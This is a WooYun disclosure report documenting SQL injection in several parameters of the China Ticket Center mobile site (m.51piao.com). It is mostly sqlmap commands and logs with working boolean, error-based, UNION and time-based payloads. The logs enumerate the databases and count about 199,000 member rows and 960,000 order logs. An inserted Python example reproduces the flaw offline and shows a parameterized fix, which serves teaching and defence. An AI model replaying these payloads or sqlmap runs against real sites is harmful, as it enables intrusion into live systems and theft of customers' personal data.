Vulnerability summary

Defect ID: wooyun-2015-0152634

Title: Multiple parameters on a China Ticket Center subsite are SQL-injectable (200,000 user records plus a large volume of log records retrievable)

Vendor: China Ticket Center (中国票务中心)

Author: 路人甲

Submitted: 2015-11-08 20:48

Fix time: 2015-12-23 20:50

Disclosure time: 2015-12-23 20:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-11-08: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2015-12-23: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Gave one of the subsites a test as well and found a few spots!~~~

Details:

Injection point 1:
http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key
The Name parameter is injectable

[Screenshot: 1.jpg]


[Screenshot: 2.jpg]


[*] starting at 12:28:48
[12:28:48] [INFO] testing connection to the target URL
[12:28:49] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[12:28:51] [INFO] target URL is stable
[12:28:51] [INFO] testing if GET parameter 'Name' is dynamic
[12:28:51] [INFO] confirming that GET parameter 'Name' is dynamic
[12:28:52] [INFO] GET parameter 'Name' is dynamic
[12:28:52] [WARNING] reflective value(s) found and filtering out
[12:28:53] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[12:28:53] [INFO] testing for SQL injection on GET parameter 'Name'
[12:28:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:29:01] [INFO] GET parameter 'Name' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:29:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:29:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:29:02] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:29:05] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[12:29:08] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'Name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[12:29:22] [INFO] testing if GET parameter 'Source' is dynamic
[12:29:22] [WARNING] GET parameter 'Source' does not appear dynamic
[12:29:23] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[12:29:23] [INFO] testing for SQL injection on GET parameter 'Source'
[12:29:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:29:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:29:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:29:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:29:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:29:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:28] [WARNING] GET parameter 'Source' is not injectable
sqlmap identified the following injection points with a total of 153 HTTP(s) req
uests:
---
Place: GET
Parameter: Name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Name=1%' AND 8999=8999 AND '%'='&Source=key
---
[12:30:28] [INFO] testing Microsoft SQL Server
[12:30:29] [INFO] confirming Microsoft SQL Server
[12:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[12:33:18] [INFO] fetching current user
[12:33:18] [INFO] retrieving the length of query output
[12:33:18] [INFO] retrieved:
[12:33:19] [WARNING] reflective value(s) found and filtering out
8
[12:33:46] [INFO] retrieved: web61247
current user: 'web61247'
[12:33:46] [INFO] fetching current database
[12:33:46] [INFO] retrieving the length of query output
[12:33:46] [INFO] retrieved: 14
[12:34:28] [INFO] retrieved: www_51piao_com
current database: 'www_51piao_com'
[12:34:28] [INFO] testing if current user is DBA
[12:34:28] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[12:39:25] [INFO] fetching database names
[12:39:25] [INFO] fetching number of databases
[12:39:25] [INFO] retrieved:
[12:39:26] [WARNING] reflective value(s) found and filtering out
7
[12:39:31] [INFO] retrieving the length of query output
[12:39:31] [INFO] retrieved:
[12:39:32] [INFO] retrieved:
[12:39:33] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[12:39:33] [INFO] retrieving the length of query output
[12:39:33] [INFO] retrieved:
[12:39:34] [INFO] retrieved:
[12:39:35] [INFO] retrieving the length of query output
[12:39:35] [INFO] retrieved:
[12:39:35] [INFO] retrieved:
[12:39:37] [INFO] retrieving the length of query output
[12:39:37] [INFO] retrieved:
[12:39:37] [INFO] retrieved:
[12:39:39] [INFO] retrieving the length of query output
[12:39:39] [INFO] retrieved:
[12:39:39] [INFO] retrieved:
[12:39:41] [INFO] retrieving the length of query output
[12:39:41] [INFO] retrieved:
[12:39:41] [INFO] retrieved:
[12:39:42] [INFO] retrieving the length of query output
[12:39:42] [INFO] retrieved:
[12:39:43] [INFO] retrieved:
[12:39:44] [INFO] retrieving the length of query output
[12:39:44] [INFO] retrieved: 14
[12:40:27] [INFO] retrieved: www_51piao_com
[12:40:27] [INFO] retrieving the length of query output
[12:40:27] [INFO] retrieved: 6
[12:40:52] [INFO] retrieved: master
[12:40:52] [INFO] retrieving the length of query output
[12:40:52] [INFO] retrieved: 6
[12:41:23] [INFO] retrieved: tempdb
[12:41:23] [INFO] retrieving the length of query output
[12:41:23] [INFO] retrieved: 5
[12:41:49] [INFO] retrieved: model
[12:41:49] [INFO] retrieving the length of query output
[12:41:49] [INFO] retrieved: 4
[12:42:06] [INFO] retrieved: msdb
[12:42:06] [INFO] retrieving the length of query output
[12:42:06] [INFO] retrieved: 4
[12:42:25] [INFO] retrieved: pubs
[12:42:25] [INFO] retrieving the length of query output
[12:42:25] [INFO] retrieved: 9
[12:42:54] [INFO] retrieved: Northwind
[12:42:54] [INFO] retrieving the length of query output
[12:42:54] [INFO] retrieved: 14
[12:43:38] [INFO] retrieved: www_51piao_com
[12:43:38] [INFO] retrieving the length of query output
[12:43:38] [INFO] retrieved:
[12:43:41] [INFO] retrieved:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
This is really too slow; using the information gathered while testing the main site, a quick test:
sqlmap.py -u "http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key" --threads 10 --dbms "Microsoft SQL Server" --count -T Member,vMember,Users,vUserMag -D www_51piao_com
Looks like the user count has grown again!~~~
[12:45:21] [INFO] retrieved:
[12:45:22] [WARNING] reflective value(s) found and filtering out
198781
[12:45:39] [INFO] retrieved: 198781
[12:45:58] [INFO] retrieved: 116
[12:46:06] [INFO] retrieved: 116
Database: www_51piao_com
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.Member | 198781 |
| dbo.vMember | 198781 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
+--------------+---------+
[12:49:16] [INFO] retrieved:
[12:49:18] [WARNING] reflective value(s) found and filtering out
960727
Database: www_51piao_com
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.OrderLog | 960727 |
+--------------+---------+


Not going any further; you get the idea!~~~
Injection point 2:
http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26
Both Name and ticketaddrid are injectable

[Screenshot: 3.jpg]


[Screenshot: 4.jpg]


[*] starting at 12:52:43
[12:52:43] [INFO] testing connection to the target URL
[12:52:43] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[12:52:45] [INFO] target URL is stable
[12:52:45] [INFO] testing if GET parameter 'Name' is dynamic
[12:52:45] [WARNING] GET parameter 'Name' does not appear dynamic
[12:52:46] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[12:52:46] [INFO] testing for SQL injection on GET parameter 'Name'
[12:52:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:52:46] [WARNING] reflective value(s) found and filtering out
[12:52:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:52:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:52:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:53:17] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
stacked queries' injectable
[12:53:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:53:38] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[12:53:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:53:38] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:53:42] [INFO] target URL appears to be UNION injectable with 1 columns
[12:53:43] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[12:54:05] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'Name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[12:54:14] [INFO] testing if GET parameter 'Source' is dynamic
[12:54:14] [WARNING] GET parameter 'Source' does not appear dynamic
[12:54:15] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[12:54:15] [INFO] testing for SQL injection on GET parameter 'Source'
[12:54:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:54:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:54:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:54:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:54:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:54:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:55:12] [WARNING] GET parameter 'Source' is not injectable
[12:55:12] [INFO] testing if GET parameter 'tickettypeid' is dynamic
[12:55:12] [WARNING] GET parameter 'tickettypeid' does not appear dynamic
[12:55:12] [WARNING] heuristic (basic) test shows that GET parameter 'tickettype
id' might not be injectable
[12:55:12] [INFO] testing for SQL injection on GET parameter 'tickettypeid'
[12:55:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:55:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:55:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:55:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:55:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:55:34] [WARNING] GET parameter 'tickettypeid' is not injectable
[12:55:34] [INFO] testing if GET parameter 'ticketdays' is dynamic
[12:55:35] [WARNING] GET parameter 'ticketdays' does not appear dynamic
[12:55:36] [WARNING] heuristic (basic) test shows that GET parameter 'ticketdays
' might not be injectable
[12:55:36] [INFO] testing for SQL injection on GET parameter 'ticketdays'
[12:55:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:55:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:55:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:55:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:55:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:56:32] [WARNING] GET parameter 'ticketdays' is not injectable
[12:56:32] [INFO] testing if GET parameter 'ticketaddrid' is dynamic
[12:56:33] [WARNING] GET parameter 'ticketaddrid' does not appear dynamic
[12:56:33] [WARNING] heuristic (basic) test shows that GET parameter 'ticketaddr
id' might not be injectable
[12:56:33] [INFO] testing for SQL injection on GET parameter 'ticketaddrid'
[12:56:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:56:40] [INFO] GET parameter 'ticketaddrid' is 'Microsoft SQL Server/Sybase A
ND error-based - WHERE or HAVING clause' injectable
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:57:01] [INFO] GET parameter 'ticketaddrid' seems to be 'Microsoft SQL Server
/Sybase stacked queries' injectable
[12:57:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:57:21] [INFO] GET parameter 'ticketaddrid' seems to be 'Microsoft SQL Server
/Sybase time-based blind' injectable
[12:57:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:57:26] [INFO] GET parameter 'ticketaddrid' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'ticketaddrid' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] y
sqlmap identified the following injection points with a total of 420 HTTP(s) req
uests:
---
Place: GET
Parameter: ticketaddrid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) AND
6888=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(98)+CHAR(97)+CHAR(113)+(SELEC
T (CASE WHEN (6888=6888) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+C
HAR(121)+CHAR(109)+CHAR(113))) AND (8421=8421
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) UNI
ON ALL SELECT CHAR(113)+CHAR(116)+CHAR(98)+CHAR(97)+CHAR(113)+CHAR(105)+CHAR(66)
+CHAR(112)+CHAR(80)+CHAR(75)+CHAR(100)+CHAR(114)+CHAR(88)+CHAR(109)+CHAR(103)+CH
AR(113)+CHAR(108)+CHAR(121)+CHAR(109)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26); WA
ITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) WAI
TFOR DELAY '0:0:5'--
Place: GET
Parameter: Name
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Name=1'); WAITFOR DELAY '0:0:5'--&Source=key&tickettypeid=3&ticketd
ays=30&ticketaddrid=26
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Name=1') WAITFOR DELAY '0:0:5'--&Source=key&tickettypeid=3&ticketda
ys=30&ticketaddrid=26
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: Name, type: Single quoted string (default)
[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric
[q] Quit
> 1
[12:57:41] [INFO] testing Microsoft SQL Server
[12:57:41] [INFO] confirming Microsoft SQL Server
[12:57:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[12:57:42] [INFO] fetching current user
current user: 'web61247'
[12:57:42] [INFO] fetching current database
current database: 'www_51piao_com'
[12:57:42] [INFO] testing if current user is DBA
current user is DBA: False
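The two injection contexts sqlmap reports above (Name as a single-quoted LIKE string, ticketaddrid as an unescaped number inside parentheses) are what you get when the search query is built by string concatenation. The following is an added example, not the site's code: it reconstructs that query shape against a constructed SQLite table so the page's own boolean-based payloads can be replayed offline, and shows the parameterized form that neutralizes them. The table, column and function names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the site's ticket table (not real data).
TICKETS = [
    (1, "Concert 1", 26),
    (2, "Opera 12", 26),
    (3, "Ballet", 11),
]


def make_db():
    """In-memory SQLite stand-in for the SQL Server 2000 backend (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Ticket (id INTEGER, Name TEXT, AddrId INTEGER)")
    conn.executemany("INSERT INTO Ticket VALUES (?, ?, ?)", TICKETS)
    return conn


def build_vulnerable_sql(name, addr_id):
    """Query built by concatenation, the shape sqlmap's payloads imply: Name lands
    inside a LIKE '%...%' literal (hence the 1%' ... '%'=' payload) and ticketaddrid
    inside a parenthesised numeric comparison (hence the 26) ... AND (8421=8421 payload)."""
    return (
        "SELECT id FROM Ticket WHERE Name LIKE '%" + name + "%' "
        "AND (AddrId = " + addr_id + ")"
    )


def search_vulnerable(conn, name, addr_id):
    return [row[0] for row in conn.execute(build_vulnerable_sql(name, addr_id))]


def search_parameterized(conn, name, addr_id):
    """Hardened form: bound parameters keep the input as data, and the numeric id is
    validated before use so anything but digits is rejected outright."""
    if not addr_id.isdigit():
        raise ValueError("ticketaddrid must be an integer")
    sql = "SELECT id FROM Ticket WHERE Name LIKE '%' || ? || '%' AND (AddrId = ?)"
    return [row[0] for row in conn.execute(sql, (name, int(addr_id)))]


def run_demo():
    """Replay the report's boolean-based payloads against both query builders."""
    conn = make_db()
    true_payload = "1%' AND 8999=8999 AND '%'='"   # boolean-true payload from the log
    false_payload = "1%' AND 8999=8998 AND '%'='"  # same shape, false condition
    return {
        # honest search: tickets with "1" in the name at address 26
        "baseline": search_vulnerable(conn, "1", "26"),
        # concatenated query: the result set tracks the injected condition (blind oracle)
        "vuln_true": search_vulnerable(conn, true_payload, "26"),
        "vuln_false": search_vulnerable(conn, false_payload, "26"),
        # numeric context: the injected AND is evaluated as part of the WHERE clause
        "vuln_numeric_false": search_vulnerable(conn, "1", "26) AND (8421=8420"),
        # parameterized query: the payload is just an unlikely search string
        "safe_true": search_parameterized(conn, true_payload, "26"),
    }


if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label:>20}: {rows}")
```

The vulnerable builder answers the true and false variants differently, which is exactly the oracle sqlmap's boolean-based blind technique relies on; the parameterized builder returns nothing for either and rejects the numeric payload before a query is formed.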


Injection point 3:
http://m.51piao.com/Ticket/TicketList.aspx?name=12&style=&sort=
Again, name is injectable

[Screenshot: 5.jpg]


[*] starting at 13:03:36
[13:03:36] [INFO] testing connection to the target URL
[13:03:37] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[13:03:38] [INFO] target URL is stable
[13:03:38] [INFO] testing if GET parameter 'name' is dynamic
[13:03:39] [INFO] confirming that GET parameter 'name' is dynamic
[13:03:39] [INFO] GET parameter 'name' is dynamic
[13:03:40] [WARNING] reflective value(s) found and filtering out
[13:03:40] [WARNING] heuristic (basic) test shows that GET parameter 'name' migh
t not be injectable
[13:03:40] [INFO] testing for SQL injection on GET parameter 'name'
[13:03:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:03:49] [INFO] GET parameter 'name' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:03:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:03:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[13:03:53] [INFO] checking if the injection point on GET parameter 'name' is a f
alse positive
[13:03:56] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[13:03:59] [INFO] testing if GET parameter 'style' is dynamic
[13:03:59] [INFO] confirming that GET parameter 'style' is dynamic
[13:04:00] [INFO] GET parameter 'style' is dynamic
[13:04:00] [WARNING] heuristic (basic) test shows that GET parameter 'style' mig
ht not be injectable
[13:04:00] [INFO] testing for SQL injection on GET parameter 'style'
[13:04:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:04:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:04:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:04:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:04:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:04:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:04:53] [WARNING] GET parameter 'style' is not injectable
[13:04:53] [INFO] testing if GET parameter 'sort' is dynamic
[13:04:53] [WARNING] GET parameter 'sort' does not appear dynamic
[13:04:54] [WARNING] heuristic (basic) test shows that GET parameter 'sort' migh
t not be injectable
[13:04:54] [INFO] testing for SQL injection on GET parameter 'sort'
[13:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:05:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:05:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:05:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:05:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:05:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:06:01] [WARNING] GET parameter 'sort' is not injectable
sqlmap identified the following injection points with a total of 253 HTTP(s) req
uests:
---
Place: GET
Parameter: name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: name=12%' AND 1810=1810 AND '%'='&style=&sort=
---
[13:06:01] [INFO] testing Microsoft SQL Server
[13:06:02] [INFO] confirming Microsoft SQL Server
[13:06:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[13:06:03] [INFO] fetching current user
[13:06:03] [INFO] retrieving the length of query output
[13:06:03] [INFO] retrieved: 8
[13:06:29] [INFO] retrieved: web61247
current user: 'web61247'
[13:06:29] [INFO] fetching current database
[13:06:29] [INFO] retrieving the length of query output
[13:06:29] [INFO] retrieved: 14
[13:07:10] [INFO] retrieved: www_51piao_com
current database: 'www_51piao_com'
[13:07:10] [INFO] testing if current user is DBA
[13:07:10] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


Injection point 4:

http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26 (POST)
__VIEWSTATE=[base64 ViewState blob omitted]&TicketSearch1:KeyWord=12&TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=


Of these: TicketSearch1:KeyWord. Name and ticketaddrid, on the other hand, did not come out as injectable here; looks like --level needs to be raised for testing!~~

[Screenshot: 6.jpg]


sqlmap got a 302 redirect to 'http://m.51piao.com/Ticket/TicketList.aspx'. Do yo
u want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data
to a new location? [Y/n] n
[13:08:17] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[13:08:19] [INFO] ignoring POST parameter '__VIEWSTATE'
[13:08:19] [WARNING] POST parameter 'TicketSearch1:KeyWord' does not appear dyna
mic
[13:08:19] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:KeyWord' might not be injectable
[13:08:19] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Key
Word'
[13:08:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:20] [WARNING] reflective value(s) found and filtering out
[13:08:26] [INFO] POST parameter 'TicketSearch1:KeyWord' seems to be 'AND boolea
n-based blind - WHERE or HAVING clause' injectable
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:08:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:08:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:08:28] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[13:08:39] [INFO] checking if the injection point on POST parameter 'TicketSearc
h1:KeyWord' is a false positive
POST parameter 'TicketSearch1:KeyWord' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N] y
[13:08:47] [WARNING] POST parameter 'TicketSearch1:BtnSearchKey' does not appear
dynamic
[13:08:47] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:BtnSearchKey' might not be injectable
[13:08:47] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Btn
SearchKey'
[13:08:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:09:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:09:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:09:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:09:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:09:59] [WARNING] POST parameter 'TicketSearch1:BtnSearchKey' is not injectab
le
[13:09:59] [WARNING] POST parameter 'TicketSearch1:Day1' does not appear dynamic
[13:10:00] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Day1' might not be injectable
[13:10:00] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Day
1'
[13:10:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:10:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:10:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:10:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:10:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:10:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:11:10] [WARNING] POST parameter 'TicketSearch1:Day1' is not injectable
[13:11:10] [WARNING] POST parameter 'TicketSearch1:Day2' does not appear dynamic
[13:11:11] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Day2' might not be injectable
[13:11:11] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Day
2'
[13:11:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:11:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:11:25] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:11:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:11:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:11:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:12:41] [WARNING] POST parameter 'TicketSearch1:Day2' is not injectable
[13:12:41] [WARNING] POST parameter 'TicketSearch1:Price1' does not appear dynam
ic
[13:12:41] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Price1' might not be injectable
[13:12:41] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Pri
ce1'
[13:12:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:12:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:12:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:12:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:13:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:13:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:13:51] [WARNING] POST parameter 'TicketSearch1:Price1' is not injectable
[13:13:51] [WARNING] POST parameter 'TicketSearch1:Price2' does not appear dynam
ic
[13:13:52] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Price2' might not be injectable
[13:13:52] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Pri
ce2'
[13:13:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:14:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:14:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:14:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:14:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:14:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:15:00] [WARNING] POST parameter 'TicketSearch1:Price2' is not injectable
[13:15:00] [WARNING] GET parameter 'Name' does not appear dynamic
[13:15:00] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[13:15:00] [INFO] testing for SQL injection on GET parameter 'Name'
[13:15:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
